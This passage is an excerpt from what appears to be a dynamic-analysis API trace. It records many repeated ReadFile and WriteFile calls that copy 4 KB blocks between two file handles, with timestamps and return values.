nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.913] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.914] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.915] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.916] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.917] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.918] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.920] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.921] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.922] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.923] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.923] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.923] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.924] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.925] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.926] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.927] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.928] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.929] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, 